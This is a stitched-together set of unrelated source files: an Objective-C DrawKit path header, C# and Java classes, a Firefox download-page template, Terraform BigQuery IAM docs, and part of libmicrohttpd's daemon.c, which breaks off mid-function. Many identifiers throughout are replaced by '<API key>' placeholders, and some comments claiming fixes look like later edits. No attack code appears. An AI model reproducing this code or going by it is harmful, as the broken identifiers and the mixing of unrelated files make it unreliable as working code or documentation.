Affects hit-detection when on-path and off-path points are coincident. Normally off-path points
have priority, but an alternative approach is to have on-path points have priority, and the off-path
points require the use of the command modifier key to be hit-detected. DK has previously always
prioritised off-path points, but this setting allows you to change that for your app.
*/
@property (class) BOOL <API key>;
- (instancetype)initWithBezierPath:(NSBezierPath*)aPath;
/** @brief Initialises a drawable path object from an existing path with the given style
The path is retained, not copied
@param aPath the path to use
@param aStyle the style to use
@return the drawable path object
*/
- (instancetype)initWithBezierPath:(NSBezierPath*)aPath style:(DKStyle*)aStyle;
/** @brief Angle of constraint for new paths.
*/
@property (class) CGFloat <API key>;
/** @brief Should the angle of the path be constrained?
Returns yes if the shift key is currently held down, otherwise no.
*/
- (BOOL)constrainWithEvent:(NSEvent*)anEvent;
// setting the path & path info
@property (copy) NSBezierPath* path;
- (void)<API key>:(NSBezierPath*)path usingKnobs:(DKKnob*)knobs;
/** @brief Return the length of the path
Length is accurately computed by summing the segment distances.
@return the path's length
*/
@property (readonly) CGFloat length;
/** @brief Return the length along the path for a given point
Points too far from the path return a value of -1. To be within range, the point needs to be within
4 x the widest stroke drawn by the style, or 4 points, whichever is larger.
@param mp a point somewhere close to the path
@return a distance along the path nearest to the point
*/
- (CGFloat)lengthForPoint:(NSPoint)mp;
/** @brief Return the length along the path for a given point
Points too far from the path return a value of -1. The point needs to be <tol> or less from the path.
@param mp a point somewhere close to the path
@param tol the tolerance value
@return a distance along the path nearest to the point
*/
- (CGFloat)lengthForPoint:(NSPoint)mp tolerance:(CGFloat)tol;
/** @brief Return the length to display to the user of a path
By default returns the same value as length. Override where the last path segment
length should be shown instead of the total path length.
@return the path's display length in points
*/
- (CGFloat)infoLengthForPath:(NSBezierPath*)path;
/** @brief Discover whether the path is open or closed.
A path is closed if it has a closePath element or its first and last points are coincident.
@return \c YES if the path is closed, \c NO if open
*/
@property (readonly, getter=isPathClosed) BOOL pathClosed;
- (void)recordPathForUndo;
- (NSBezierPath*)undoPath;
- (void)clearUndoPath;
// modifying paths
/** @brief Merges two paths by simply appending them
This simply appends the part of the other object to this one and recomputes the bounds, etc.
the result can act like a union, difference or XOR according to the relative placements of the
paths and the winding rules in use.
@param anotherPath another drawable path object like this one
*/
- (void)combine:(DKDrawablePath*)anotherPath;
/** @brief Converts each subpath in the current path to a separate object
A subpath is a path delineated by a moveTo opcode. Each one is made a separate new path. If there
is only one subpath (common) then the result will have just one entry.
@return an array of DKDrawablePath objects
*/
- (NSArray<DKDrawablePath*>*)breakApart;
/** @brief Delete the point from the path with the given part code
Only on-path points of a curve are allowed to be deleted, not control points. The partcodes will
be renumbered by this, so do not cache the partcode beyond this point.
@param pc the partcode to delete
@return YES if the point could be deleted, NO if not */
- (BOOL)<API key>:(NSInteger)pc;
/** @brief Delete a segment from the path at the given index
If the element is removed from the middle, the path is split into two subpaths. If removed at
either end, the path is shortened. Partcodes will change.
@param indx the index of the element to delete
@return YES if the element was deleted, NO if not
*/
- (BOOL)<API key>:(NSInteger)indx;
/** @brief Delete a segment from the path at the given point
Finds the element hit by the point and calls -<API key>:
@param loc a point
@return YES if the element was deleted, NO if not
*/
- (BOOL)<API key>:(NSPoint)loc;
- (NSInteger)pathInsertPointAt:(NSPoint)loc ofType:(<API key>)pathPointType;
/** @brief Move a single control point to a new position
Essential interactive editing method
@param pc the partcode for the point to be moved
@param mp the point to move it to
@param evt the event (used to grab modifier flags) */
- (void)movePathPartcode:(NSInteger)pc toPoint:(NSPoint)mp event:(NSEvent*)evt;
/** @brief Preflights a potential join to determine if the join would be made
Allows a join operation to be preflighted without actually performing the join.
@param anotherPath another drawable path object like this one
@param tol a value used to determine if the end points are placed sufficiently close to be joinable
@return a join result value, indicating which end(s) would be joined, if any
*/
- (<API key>)wouldJoin:(DKDrawablePath*)anotherPath tolerance:(CGFloat)tol;
/** @brief Joins open paths together at their ends
This attempts to join either or both ends of the two paths if they are placed sufficiently
closely. Usually the higher level join action at the layer level will be used.
@param anotherPath another drawable path object like this one
@param tol a value used to determine if the end points are placed sufficiently close to be joinable
@param colin if YES, and the joined segments are curves, this adjusts the control points of the curve
@return a join result value, indicating which end(s) were joined, if any
*/
- (<API key>)join:(DKDrawablePath*)anotherPath tolerance:(CGFloat)tol makeColinear:(BOOL)colin;
/** @brief Splits a path into two paths at a specific point
The new path has the same style and user info as the original, but is not added to the layer
by this method. If <distance> is <= 0 or >= length, nil is returned.
@param distance the position from the start of the path to make the split
@return a new path, being the section of the original path from <distance> to the end.
*/
- (nullable DKDrawablePath*)dividePathAtLength:(CGFloat)distance;
// creating paths
@property <API key> pathCreationMode;
/** @brief Test for the ending criterion of a path loop
Currently only checks for a double-click
@param event an event
@return YES to end the loop, NO to continue
*/
- (BOOL)<API key>:(NSEvent*)event;
/** @brief Discover whether the given partcode is an open end point of the path
A closed path always returns NO, as it has no open end points. An open path will return YES for
only the first and last points.
@param partcode a partcode to test
@return YES if the partcode is one of the endpoints, NO otherwise
*/
- (BOOL)isOpenEndPoint:(NSInteger)partcode;
/** @brief Whether the object is extending its path or starting from scratch.
When <code>YES</code>, this affects the starting partcode for the creation process. Normally paths are started
from scratch, but if <code>YES</code>, this extends the existing path from its end if the path is open. The
tool that coordinates the creation of new objects is responsible for managing this appropriately.
*/
@property BOOL <API key>;
/** @brief Event loop for creating a curved path point by point
Keeps control until the ending criteria are met (double-click or click on first point).
@param initialPoint where to start
*/
- (void)pathCreateLoop:(NSPoint)initialPoint;
/** @brief Event loop for creating a single straight line
Keeps control until the ending criteria are met (second click).
@param initialPoint where to start
*/
- (void)lineCreateLoop:(NSPoint)initialPoint;
/** @brief Event loop for creating a polygon consisting of straight line sections
Keeps control until the ending criteria are met (double-click or click on start point).
@param initialPoint where to start
*/
- (void)polyCreateLoop:(NSPoint)initialPoint;
/** @brief Event loop for creating a curved path by fitting it to a series of sampled points
Keeps control until the ending criteria are met (mouse up).
@param initialPoint where to start
*/
- (void)freehandCreateLoop:(NSPoint)initialPoint;
/** @brief Event loop for creating an arc or a wedge
Keeps control until the ending criteria are met (second click).
@param initialPoint where to start
*/
- (void)arcCreateLoop:(NSPoint)initialPoint;
/** @brief Overrideable hook at the end of path creation
*/
- (void)<API key>;
- (NSEvent*)postMouseUpAtPoint:(NSPoint)p;
/** @brief The smoothness of paths created in freehand mode.
The bigger the number, the smoother but less accurate the path. The value is the distance in
base units that a point has to be to the path to be considered a fit. Typical values are between 1 and 20.
*/
@property CGFloat freehandSmoothing;
// converting to other types
- (DKDrawableShape*)makeShape;
@property (readonly) BOOL canConvertToTrack;
/** @brief Make a copy of the path but with a parallel offset
@param distance the distance from the original that the path is offset (negative for upward displacement)
@param smooth if YES, also smooths the resulting path
@return a DKDrawablePath object
*/
- (DKDrawablePath*)<API key>:(CGFloat)distance smooth:(BOOL)smooth;
// user level commands this object can respond to:
/** @brief Converts this object to the equivalent shape
Undoably replaces itself in its current layer by the equivalent shape object
@param sender the action's sender
*/
- (IBAction)convertToShape:(nullable id)sender;
/** @brief Adds some random offset to every point on the path
Just a fun effect
@param sender the action's sender
*/
- (IBAction)addRandomNoise:(nullable id)sender;
/** @brief Replaces the path with an outline of the path
The result depends on the style - specifically the maximum stroke width. The path is replaced by
a path whose edges are where the edge of the stroke of the original path lie. The topmost stroke
is used to set the fill of the resulting object's style. The result is similar but not always
identical to the original. For complex styles you will lose a lot of information.
@param sender the action's sender
*/
- (IBAction)convertToOutline:(nullable id)sender;
/** @brief Replaces the object with new objects, one for each subpath in the original
@param sender the action's sender
*/
- (IBAction)breakApart:(nullable id)sender;
- (IBAction)roughenPath:(nullable id)sender;
/** @brief Tries to smooth a path by curve fitting. If the path is already made up from bezier elements,
this will have no effect. vector paths can benefit however.
The current set smoothness value is used
@param sender the action's sender
*/
- (IBAction)smoothPath:(nullable id)sender;
/** @brief Tries to smooth a path by curve fitting. If the path is already made up from bezier elements,
this will have no effect. vector paths can benefit however.
The current set smoothness value x4 is used
@param sender the action's sender
*/
- (IBAction)smoothPathMore:(nullable id)sender;
/** @brief Adds a copy of the receiver to the drawing with a parallel offset path
This is really just a test of the algorithm
@param sender the action's sender
*/
- (IBAction)parallelCopy:(nullable id)sender;
/** @brief Attempts to curve-fit the object's path
The path might not change, depending on how it is made up
@param sender the action's sender
*/
- (IBAction)curveFit:(nullable id)sender;
/** @brief Reverses the direction of the object's path
Does not change the path's appearance directly, but may depending on the current style, e.g. arrows
will flip to the other end.
@param sender the action's sender
*/
- (IBAction)reversePath:(nullable id)sender;
/** @brief Flips the path horizontally
The path is flipped directly
@param sender the action's sender
*/
- (IBAction)<API key>:(nullable id)sender;
/** @brief Flips the path vertically
The path is flipped directly
@param sender the action's sender
*/
- (IBAction)toggleVerticalFlip:(nullable id)sender;
/** @brief Closes the path if not already closed
Paths created using the bezier tool are always left open by default
@param sender the action's sender
*/
- (IBAction)closePath:(nullable id)sender;
@end
enum {
//! special partcode value used to mean snap to the nearest point on the path itself:
<API key> = -99
};
extern NSPoint gMouseForPathSnap;
extern NSString* const <API key>;
<API key> |
namespace Conjure.EFX.Options
{
    /// <summary>
    /// Create model file generation options.
    /// </summary>
    /// <seealso cref="BaseModelOptions" />
    public class CreateModelOptions : BaseModelOptions
    {
        /// <summary>
        /// Initializes a new instance of the <see cref="CreateModelOptions"/> class.
        /// </summary>
        /// <param name="variables">The variable dictionary used for name expansion.</param>
        /// <param name="prefix">The option prefix; "Create" is appended to scope these options.</param>
        public CreateModelOptions(VariableDictionary variables, string prefix)
            : base(variables, AppendPrefix(prefix, "Create"))
        {
            // Default name template; "{Entity.Name}" is expanded per entity at generation time.
            Name = "{Entity.Name}CreateModel";
        }
    }
}
package com.sensia.tools.client.swetools.editors.sensorml.renderer.editor.panels.sml;
import com.sensia.relaxNG.RNGElement;
import com.sensia.relaxNG.RNGTag;
import com.sensia.tools.client.swetools.editors.sensorml.panels.AbstractPanel;
import com.sensia.tools.client.swetools.editors.sensorml.panels.IPanel;
import com.sensia.tools.client.swetools.editors.sensorml.panels.IRefreshHandler;
import com.sensia.tools.client.swetools.editors.sensorml.renderer.editor.panels.line.<API key>;
/**
 * Panel renderer for a SensorML element: routes the "label", "definition"
 * and "description" child panels into the corresponding slots provided by
 * the line-based superclass layout. Children with any other name are ignored.
 */
public class <API key> extends <API key><RNGElement> {

	public <API key>(RNGElement tag, IRefreshHandler refreshHandler) {
		super(tag, refreshHandler);
	}

	/** @return the name of the underlying RELAX NG element. */
	@Override
	public String getName() {
		return getTag().getName();
	}

	/**
	 * Dispatches a child panel into the matching layout slot by its name.
	 * Constant-first equals() avoids a NullPointerException if the child's
	 * name is null; such children are silently skipped.
	 */
	@Override
	protected void addInnerElement(IPanel<? extends RNGTag> element) {
		// Hoist the name lookup so it is computed only once per child.
		final String name = element.getName();
		if ("label".equals(name)) {
			labelPanel.add(element.getPanel());
		} else if ("definition".equals(name)) {
			defPanel.add(element.getPanel());
		} else if ("description".equals(name)) {
			afterDotsPanel.add(element.getPanel());
		}
	}

	/**
	 * Cloning is not supported by this renderer.
	 *
	 * @return always {@code null}; callers must handle the null result.
	 */
	@Override
	protected AbstractPanel<RNGElement> newInstance() {
		return null;
	}
}
{% extends "/firefox/base-resp.html" %}
{% add_lang_files "mobile" %}
{% block page_title %}Mozilla Firefox {% endblock %}
{% block page_title_suffix %}{% endblock %}
{% block body_id %}firefox-download{% endblock %}
{% block page_desc %} Firefox WindowsMac Linux{% endblock %}
{% block site_header_logo %}
<h2><a href="{{ url('mozorg.home') }}"><img src="{{ media('img/firefox/template/header-logo-inverse.png') }}" alt="Mozilla Firefox" width="130" height="49"></a></h2>
{% endblock %}
{% block site_css %}
{{ css('firefox_download') }}
{% endblock %}
{% block js %}
{{ js('firefox_download') }}
{% endblock %}
{% block breadcrumbs %}
<nav class="<API key>">
<a class="home" href="{{ url('mozorg.home') }}">{{_('Home')}}</a>
<b>»</b>
<a href="{{ url('firefox.desktop.index') }}">Firefox </a>
<b>»</b>
<span>Firefox </span>
</nav>
{% endblock %}
{% block content %}

{# English locales link to the in-page mobile anchor; others get the localized features page. #}
{% if request.locale.startswith('en') %}
  {% set mobile_link = url('firefox.fx') + '#mobile' %}
{% else %}
  {% set mobile_link = '/firefox/mobile/features/' %}
{% endif %}

<div id="main-feature">
  <h1>Firefox <br /><strong></strong><br /></h1>
</div>

<article id="main-content" class="billboard">

  <p class="download-content">Firefox!<br>Mozilla<br></p>

  <div id="default-steps" class="download">
    <p><a id="default-download" href="http://download.myfirefox.com.tw/releases/webins3.0/official/zh-TW/Firefox-latest.exe" title="firefox download"></a></p>
  </div>

  <div id="mac-steps" class="download">
    <ol class="install-steps">
      <li class="one"><p><a id="mac-download" href="http://download.myfirefox.com.tw/releases/firefox/zh-TW/Firefox-latest.dmg" title="firefox download"></a></p></li>
      <li class="two"><p> Firefox </p></li>
      <li class="three"><p>Firefox Mac dockFirefox </p></li>
    </ol>
  </div>

  {# Fixed: this paragraph was previously left unclosed before the separator div. #}
  <p class="download-content"> <a href="/firefox/features/">Firefox </a><br>
  <a href="/firefox/faq/"></a></p>

  <div class="download-separator"></div>

  {# Use .get() so a missing ?install= query parameter yields None instead of raising. #}
  {{ download_firefox(install=request.GET.get('install'), direct_download=True) }}

  <div class="all_versions">
    <ul>
      <li>Windows</li>
      <li class="win-express"><a href="?os=win&install=express">Windows </a></li>
      <li class="win-full"><a href="?os=win&install=full">Windows </a></li>
    </ul>
    <ul>
      <li>Mac</li>
      <li class="osx"><a href="?os=osx">Mac OSX</a></li>
    </ul>
    <ul>
      <li>Linux</li>
      <li class="linux-32bit"><a href="?os=linux&install=32bit">Linux 32bit</a></li>
      <li class="linux-64bit"><a href="?os=linux&install=64bit">Linux 64bit</a></li>
    </ul>
  </div>

  <div class="other_langs">
    <a href="{{ url('firefox.all') }}"> Other Language Versions</a>
  </div>

</article>

{% endblock %}
{% block email_form %}
<div id="email-form-wrapper" class="billboard">
{{ super() }}
</div>
{% endblock%}
{% block site_footer %}
<section id="colophon" class="billboard">
<nav id="footer">
{% include 'firefox/includes/simple_footer_items.html' %}
</nav>
</section>
{% endblock %} |
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace <API key>
{
    public static partial class <API key>
    {
        /// <summary>
        /// Returns all elements in a sequence, excluding the last.
        /// </summary>
        /// <typeparam name="T">The element type of the sequence.</typeparam>
        /// <param name="sequence">The source sequence; must not be null.</param>
        /// <returns>A lazily-evaluated sequence containing every element except the last.</returns>
        public static IEnumerable<T> ButLast<T>(this IEnumerable<T> sequence)
        {
            // Validate eagerly, before deferred execution begins, so the caller
            // sees the exception at call time rather than on first enumeration.
            if (sequence == null) throw new <API key>(nameof(sequence));
            return ButLastImpl<T>(sequence);
        }

        // Iterator implementation: buffers exactly one element so the final
        // element is never yielded. Single pass, O(1) extra memory.
        private static IEnumerable<T> ButLastImpl<T>(IEnumerable<T> sequence)
        {
            using (var iterator = sequence.GetEnumerator())
            {
                if (!iterator.MoveNext()) yield break;
                var previous = iterator.Current;
                while (iterator.MoveNext())
                {
                    yield return previous;
                    previous = iterator.Current;
                }
            }
        }
    }
}
layout: "google"
subcategory: "BigQuery"
page_title: "Google: <API key>"
sidebar_current: "<API key>"
description: |-
Collection of resources to manage IAM policy for a BigQuery dataset.
# IAM policy for BigQuery dataset
Three different resources help you manage your IAM policy for BigQuery dataset. Each of these resources serves a different use case:
* `<API key>`: Authoritative. Sets the IAM policy for the dataset and replaces any existing policy already attached.
* `<API key>`: Authoritative for a given role. Updates the IAM policy to grant a role to a list of members. Other roles within the IAM policy for the dataset are preserved.
* `<API key>`: Non-authoritative. Updates the IAM policy to grant a role to a new member. Other members for the role for the dataset are preserved.
These resources are intended to convert the permissions system for BigQuery datasets to the standard IAM interface. For advanced usages, including [creating authorized views](https://cloud.google.com/bigquery/docs/share-access-views), please use either `<API key>` or the `access` field on `<API key>`.
~> **Note:** These resources **cannot** be used with `<API key>` resources or the `access` field on `<API key>` or they will fight over what the policy should be.
~> **Note:** Using any of these resources will remove any authorized view permissions from the dataset. To assign and preserve authorized view permissions use the `<API key>` instead.
~> **Note:** Legacy BigQuery roles `OWNER` `WRITER` and `READER` **cannot** be used with any of these IAM resources. Instead use the full role form of: `roles/bigquery.dataOwner` `roles/bigquery.dataEditor` and `roles/bigquery.dataViewer`.
~> **Note:** `<API key>` **cannot** be used in conjunction with `<API key>` and `<API key>` or they will fight over what your policy should be.
~> **Note:** `<API key>` resources **can be** used in conjunction with `<API key>` resources **only if** they do not grant privilege to the same role.
## google\_bigquery\_dataset\_iam\_policy
hcl
data "google_iam_policy" "owner" {
binding {
    role          = "roles/bigquery.dataOwner"
members = [
"user:jane@example.com",
]
}
}
resource "<API key>" "dataset" {
dataset_id = "your-dataset-id"
policy_data = data.google_iam_policy.owner.policy_data
}
## google\_bigquery\_dataset\_iam\_binding
hcl
resource "<API key>" "reader" {
dataset_id = "your-dataset-id"
role = "roles/bigquery.dataViewer"
members = [
"user:jane@example.com",
]
}
## google\_bigquery\_dataset\_iam\_member
hcl
resource "<API key>" "editor" {
dataset_id = "your-dataset-id"
role = "roles/bigquery.dataEditor"
member = "user:jane@example.com"
}
## Argument Reference
The following arguments are supported:
* `dataset_id` - (Required) The dataset ID.
* `member/members` - (Required) Identities that will be granted the privilege in `role`.
Each entry can have one of the following values:
* **allUsers**: A special identifier that represents anyone who is on the internet; with or without a Google account.
* **<API key>**: A special identifier that represents anyone who is authenticated with a Google account or a service account.
* **user:{emailid}**: An email address that represents a specific Google account. For example, alice@gmail.com or joe@example.com.
* **serviceAccount:{emailid}**: An email address that represents a service account. For example, my-other-app@appspot.gserviceaccount.com.
* **group:{emailid}**: An email address that represents a Google group. For example, admins@example.com.
* **domain:{domain}**: A G Suite domain (primary, instead of alias) name that represents all the users of that domain. For example, google.com or example.com.
* `role` - (Required) The role that should be applied. Only one
`<API key>` can be used per role. Note that custom roles must be of the format
`[projects|organizations]/{parent-name}/roles/{role-name}`.
* `policy_data` - (Required only by `<API key>`) The policy data generated by
a `google_iam_policy` data source.
## Attributes Reference
In addition to the arguments listed above, the following computed attributes are
exported:
* `etag` - (Computed) The etag of the dataset's IAM policy.
## Import
IAM member imports use space-delimited identifiers; the resource in question, the role, and the account. This member resource can be imported using the `dataset_id`, role, and account e.g.
$ terraform import <API key>.dataset_iam "projects/your-project-id/datasets/dataset-id roles/viewer user:foo@example.com"
IAM binding imports use space-delimited identifiers; the resource in question and the role. This binding resource can be imported using the `dataset_id` and role, e.g.
$ terraform import <API key>.dataset_iam "projects/your-project-id/datasets/dataset-id roles/viewer"
IAM policy imports use the identifier of the resource in question. This policy resource can be imported using the `dataset_id`, role, and account e.g.
$ terraform import <API key>.dataset_iam projects/your-project-id/datasets/dataset-id
-> **Custom Roles**: If you're importing a IAM resource with a custom role, make sure to use the
full name of the custom role, e.g. `[projects/my-project|organizations/my-org]/roles/my-custom-role`. |
// Changes: - converted to C++
// - added ufal::microrestd::libmicrohttpd namespace
// - use compile-time configuration instead of configure script
/**
* @file microhttpd/daemon.c
* @brief A minimal-HTTP server library
* @author Daniel Pittman
* @author Christian Grothoff
*/
#if defined(_WIN32) && !defined(__CYGWIN__)
/* override small default value */
#define FD_SETSIZE 1024
#define <API key> 64
#else
#define <API key> FD_SETSIZE
#endif
#include "platform.h"
#include "internal.h"
#include "response.h"
#include "connection.h"
#include "memorypool.h"
#include <limits.h>
#include "autoinit_funcs.h"
#if HAVE_SEARCH_H
#include <search.h>
#else
#include "tsearch.h"
#endif
#if HTTPS_SUPPORT
#include "connection_https.h"
#include <gcrypt.h>
#endif
#ifdef HAVE_POLL_H
#include <poll.h>
#endif
#ifdef LINUX
#include <sys/sendfile.h>
#endif
#ifdef _WIN32
#ifndef WIN32_LEAN_AND_MEAN
#define WIN32_LEAN_AND_MEAN 1
#endif /* !WIN32_LEAN_AND_MEAN */
#include <windows.h>
#endif
namespace ufal {
namespace microrestd {
namespace libmicrohttpd {
#ifndef HAVE_ACCEPT4
#define HAVE_ACCEPT4 0
#endif
/**
 * Default connection limit.  On non-Windows platforms a few descriptors
 * are presumably reserved for the daemon's own use -- TODO confirm.
 */
#ifndef WINDOWS
/* Parenthesized so the expansion stays correct inside larger
   expressions (the bare `FD_SETSIZE - 4` would bind incorrectly in
   contexts such as `2 * <API key>`). */
#define <API key> (FD_SETSIZE - 4)
#else
#define <API key> FD_SETSIZE
#endif
/**
* Default memory allowed per connection.
*/
#define <API key> (32 * 1024)
#ifdef TCP_FASTOPEN
/**
* Default TCP fastopen queue size.
*/
#define <API key> 10
#endif
/**
* Print extra messages with reasons for closing
* sockets? (only adds non-error messages).
*/
#define DEBUG_CLOSE MHD_NO
/**
* Print extra messages when establishing
* connections? (only adds non-error messages).
*/
#define DEBUG_CONNECT MHD_NO
#ifndef LINUX
#ifndef MSG_NOSIGNAL
#define MSG_NOSIGNAL 0
#endif
#endif
#ifndef SOCK_CLOEXEC
#define SOCK_CLOEXEC 0
#endif
#ifndef EPOLL_CLOEXEC
#define EPOLL_CLOEXEC 0
#endif
/**
 * Default implementation of the panic function:
 * prints an error message (when message support is compiled in)
 * and aborts the process.
 *
 * @param cls unused
 * @param file name of the file with the problem
 * @param line line number with the problem
 * @param reason error message with details
 */
static void
mhd_panic_std (void * /*cls*/,
               const char *file,
               unsigned int line,
               const char *reason)
{
#if HAVE_MESSAGES
  fprintf (stderr, "Fatal error in GNU libmicrohttpd %s:%u: %s\n",
           file, line, reason);
#endif
  /* Abort unconditionally: a panic is not recoverable. */
  abort ();
}
/**
 * Handler for fatal errors (mhd_panic_std appears to be the default
 * implementation; the assignment happens outside this file section).
 */
MHD_PanicCallback mhd_panic;

/**
 * Closure argument passed to "mhd_panic" invocations.
 */
void *mhd_panic_cls;

#ifdef _WIN32
/**
 * Track initialization of winsock; starts at 0 (not initialized).
 */
static int mhd_winsock_inited_ = 0;
#endif
/**
 * Trace up to and return the master daemon.  If the supplied daemon
 * is itself a master (no parent link), it is returned unchanged.
 *
 * @param daemon handle to a daemon
 * @return master daemon handle
 */
static struct MHD_Daemon*
MHD_get_master (struct MHD_Daemon *daemon)
{
  struct MHD_Daemon *d;

  /* Follow the 'master' links until we reach the root daemon. */
  for (d = daemon; d->master != NULL; d = d->master)
    ;
  return d;
}
/**
 * Maintain connection count for single address.
 *
 * NOTE: MHD_ip_addr_compare() memcmp()s instances of this struct up to
 * (but excluding) the 'count' field, so the field order and 'count'
 * being last are significant -- do not reorder fields.
 */
struct MHD_IPCount
{
  /**
   * Address family. AF_INET or AF_INET6 for now.
   */
  int family;

  /**
   * Actual address.
   */
  union
  {
    /**
     * IPv4 address.
     */
    struct in_addr ipv4;
#if HAVE_INET6
    /**
     * IPv6 address.
     */
    struct in6_addr ipv6;
#endif
  } addr;

  /**
   * Counter of connections attributed to this address
   * (incremented in MHD_ip_limit_add, decremented in MHD_ip_limit_del).
   */
  unsigned int count;
};
/**
 * Lock shared structure for IP connection counts and connection DLLs.
 *
 * @param daemon handle to daemon where lock is
 */
static void
MHD_ip_count_lock (struct MHD_Daemon *daemon)
{
  /* A failure to take the lock is unrecoverable; bail out hard. */
  if (MHD_mutex_lock_ (&daemon-><API key>) != MHD_YES)
    MHD_PANIC ("Failed to acquire IP connection limit mutex\n");
}
/**
 * Unlock shared structure for IP connection counts and connection DLLs.
 *
 * @param daemon handle to daemon where lock is
 */
static void
MHD_ip_count_unlock (struct MHD_Daemon *daemon)
{
  /* A failure to release the lock is unrecoverable; bail out hard. */
  if (MHD_mutex_unlock_ (&daemon-><API key>) != MHD_YES)
    MHD_PANIC ("Failed to release IP connection limit mutex\n");
}
/**
 * Tree comparison function for IP addresses (supplied to tsearch() family).
 * We compare everything in the struct up through the beginning of the
 * 'count' field.
 *
 * @param a1 first address to compare (a struct MHD_IPCount *)
 * @param a2 second address to compare (a struct MHD_IPCount *)
 * @return negative, zero or positive depending on result of compare
 */
static int
MHD_ip_addr_compare (const void *a1, const void *a2)
{
  /* Byte-wise compare of 'family' + 'addr'; relies on keys being fully
     zeroed before use (see the memset in MHD_ip_addr_to_key) so union
     and padding bytes cannot produce spurious differences. */
  return memcmp (a1, a2, offsetof (struct MHD_IPCount, count));
}
/**
 * Parse a socket address and initialize 'key' from it.
 *
 * @param addr address to parse
 * @param addrlen number of bytes in addr
 * @param key where to store the parsed address
 * @return #MHD_YES on success and #MHD_NO otherwise (e.g., invalid address type)
 */
static int
MHD_ip_addr_to_key (const struct sockaddr *addr,
                    socklen_t addrlen,
                    struct MHD_IPCount *key)
{
  /* Zero the whole key first so padding/union bytes compare equal
     later in MHD_ip_addr_compare(). */
  memset (key, 0, sizeof (*key));

  /* IPv4 address? */
  if (addrlen == sizeof (struct sockaddr_in))
    {
      const struct sockaddr_in *addr4 = (const struct sockaddr_in*) addr;

      key->family = AF_INET;
      memcpy (&key->addr.ipv4, &addr4->sin_addr, sizeof (addr4->sin_addr));
      return MHD_YES;
    }
#if HAVE_INET6
  /* IPv6 address? */
  if (addrlen == sizeof (struct sockaddr_in6))
    {
      const struct sockaddr_in6 *addr6 = (const struct sockaddr_in6*) addr;

      key->family = AF_INET6;
      memcpy (&key->addr.ipv6, &addr6->sin6_addr, sizeof (addr6->sin6_addr));
      return MHD_YES;
    }
#endif
  /* Unsupported address family. */
  return MHD_NO;
}
/**
 * Check if IP address is over its limit.
 *
 * @param daemon handle to daemon where connection counts are tracked
 * @param addr address to add (or increment counter)
 * @param addrlen number of bytes in addr
 * @return Return #MHD_YES if IP below limit, #MHD_NO if IP has surpassed limit.
 *         Also returns #MHD_NO if fails to allocate memory.
 */
static int
MHD_ip_limit_add (struct MHD_Daemon *daemon,
                  const struct sockaddr *addr,
                  socklen_t addrlen)
{
  struct MHD_IPCount *key;
  void **nodep;
  void *node;
  int result;

  /* Counts are kept on the master daemon so all workers share them. */
  daemon = MHD_get_master (daemon);
  /* Ignore if no connection limit assigned */
  if (0 == daemon-><API key>)
    return MHD_YES;
  if (NULL == (key = (struct MHD_IPCount*) malloc (sizeof(*key))))
    return MHD_NO;
  /* Initialize key */
  if (MHD_NO == MHD_ip_addr_to_key (addr, addrlen, key))
    {
      /* Allow unhandled address types through */
      free (key);
      return MHD_YES;
    }
  MHD_ip_count_lock (daemon);
  /* Search for the IP address; tsearch() inserts 'key' if not present
     (ownership then passes to the tree) or returns the existing node. */
  if (NULL == (nodep = (void**) tsearch (key,
                                         &daemon-><API key>,
                                         &MHD_ip_addr_compare)))
    {
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Failed to add IP connection count node\n");
#endif
      MHD_ip_count_unlock (daemon);
      free (key);
      return MHD_NO;
    }
  node = *nodep;
  /* If we got an existing node back, free the one we created */
  if (node != key)
    free(key);
  key = (struct MHD_IPCount *) node;
  /* Test if there is room for another connection; if so,
   * increment count */
  result = (key->count < daemon-><API key>);
  if (MHD_YES == result)
    ++key->count;
  MHD_ip_count_unlock (daemon);
  return result;
}
/**
 * Decrement connection count for IP address, removing from table
 * when the count reaches 0.
 *
 * @param daemon handle to daemon where connection counts are tracked
 * @param addr address to remove (or decrement counter)
 * @param addrlen number of bytes in @a addr
 */
static void
MHD_ip_limit_del (struct MHD_Daemon *daemon,
                  const struct sockaddr *addr,
                  socklen_t addrlen)
{
  struct MHD_IPCount search_key;
  struct MHD_IPCount *found_key;
  void **nodep;

  /* Counts are kept on the master daemon so all workers share them. */
  daemon = MHD_get_master (daemon);
  /* Ignore if no connection limit assigned */
  if (0 == daemon-><API key>)
    return;
  /* Initialize search key */
  if (MHD_NO == MHD_ip_addr_to_key (addr, addrlen, &search_key))
    return;
  MHD_ip_count_lock (daemon);
  /* Search for the IP address */
  if (NULL == (nodep = (void**) tfind (&search_key,
                                       &daemon-><API key>,
                                       &MHD_ip_addr_compare)))
    {
      /* Something's wrong if we couldn't find an IP address
       * that was previously added */
      MHD_PANIC ("Failed to find previously-added IP address\n");
    }
  found_key = (struct MHD_IPCount *) *nodep;
  /* Validate existing count for IP address */
  if (0 == found_key->count)
    {
      MHD_PANIC ("Previously-added IP address had 0 count\n");
    }
  /* Remove the node entirely if count reduces to 0; the tree only
     borrows the key pointer, so we must free it ourselves after
     tdelete(). */
  if (0 == --found_key->count)
    {
      tdelete (found_key,
               &daemon-><API key>,
               &MHD_ip_addr_compare);
      free (found_key);
    }
  MHD_ip_count_unlock (daemon);
}
#if HTTPS_SUPPORT
/**
 * Callback for receiving data from the socket.
 *
 * @param connection the MHD_Connection structure
 * @param other where to write received data to
 * @param i maximum size of other (in bytes)
 * @return number of bytes actually received, or -1 with errno set on
 *         transient failure
 */
static ssize_t
recv_tls_adapter (struct MHD_Connection *connection, void *other, size_t i)
{
  int res;

  if (MHD_YES == connection->tls_read_ready)
    {
      /* This connection no longer counts as holding buffered TLS data;
         keep the daemon-wide counter in sync.
         (BUG FIX: the decrement operator and terminating ';' were
         missing here, which both broke the statement and would have
         left the counter permanently inflated.) */
      connection->daemon->num_tls_read_ready--;
      connection->tls_read_ready = MHD_NO;
    }
  res = gnutls_record_recv (connection->tls_session, other, i);
  if ( (GNUTLS_E_AGAIN == res) ||
       (<API key> == res) )
    {
      /* Transient condition: report EINTR so the caller retries. */
      <API key> (EINTR);
#if EPOLL_SUPPORT
      connection->epoll_state &= ~<API key>;
#endif
      return -1;
    }
  if (res < 0)
    {
      /* Likely '<API key>' (client communication
         disrupted); set errno to something caller will interpret
         correctly as a hard error */
      <API key> (ECONNRESET);
      return res;
    }
  /* Cast avoids the signed/unsigned comparison; res >= 0 here. */
  if (res == (ssize_t) i)
    {
      /* A full read suggests GnuTLS may still be buffering decoded
         data for this session; remember that so it is drained without
         waiting for socket readiness. */
      connection->tls_read_ready = MHD_YES;
      connection->daemon->num_tls_read_ready++;
    }
